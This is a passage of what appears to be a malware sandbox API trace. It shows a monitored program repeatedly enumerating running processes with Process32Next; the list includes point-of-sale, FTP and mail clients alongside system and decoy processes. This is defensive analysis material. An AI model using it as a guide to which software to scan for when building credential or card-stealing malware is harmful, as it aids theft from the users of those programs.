szExeFile="afr38.exe")) returned 1 [0096.520] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.523] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.527] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.531] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.535] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.538] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xab0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.542] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.546] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.550] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.554] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="language-want.exe")) returned 1 [0096.556] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow_sure_still.exe")) returned 1 [0096.559] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="store.exe")) returned 1 [0096.561] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bookstyleactually.exe")) returned 1 [0096.563] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="movie.exe")) returned 1 [0096.565] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.569] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.572] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0096.575] CloseHandle (hObject=0x1500) returned 1 [0096.575] Sleep (dwMilliseconds=0x64) [0096.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1500 [0096.683] Process32First (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.686] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.689] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.692] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.694] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.697] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.700] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.702] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.705] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.709] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.712] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.714] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.717] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.720] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.724] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.726] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.730] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.734] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.738] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.740] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.742] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.745] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.749] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.752] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.755] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.758] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.760] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.764] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.766] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.769] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rule_night.exe")) returned 1 [0096.771] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="lawyercheckpractice.exe")) returned 1 [0096.773] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="move.exe")) returned 1 [0096.774] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="propertystep.exe")) returned 1 [0096.776] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0096.779] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="deep.exe")) returned 1 [0096.781] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="candidate-coach.exe")) returned 1 [0096.786] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="central rule.exe")) returned 1 [0096.788] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="stage.exe")) returned 1 [0096.790] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="which.exe")) returned 1 [0096.792] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="could team.exe")) returned 1 [0096.794] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="special avoid share.exe")) returned 1 [0096.797] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="collection.exe")) returned 1 [0096.799] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="none.exe")) returned 1 [0096.801] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="perform.exe")) returned 1 [0096.802] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.804] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.806] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.807] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.809] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.812] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.814] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.816] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.818] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.820] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.826] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.829] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.831] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.833] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.835] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.837] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.840] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.842] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.845] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.847] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.850] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.852] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, 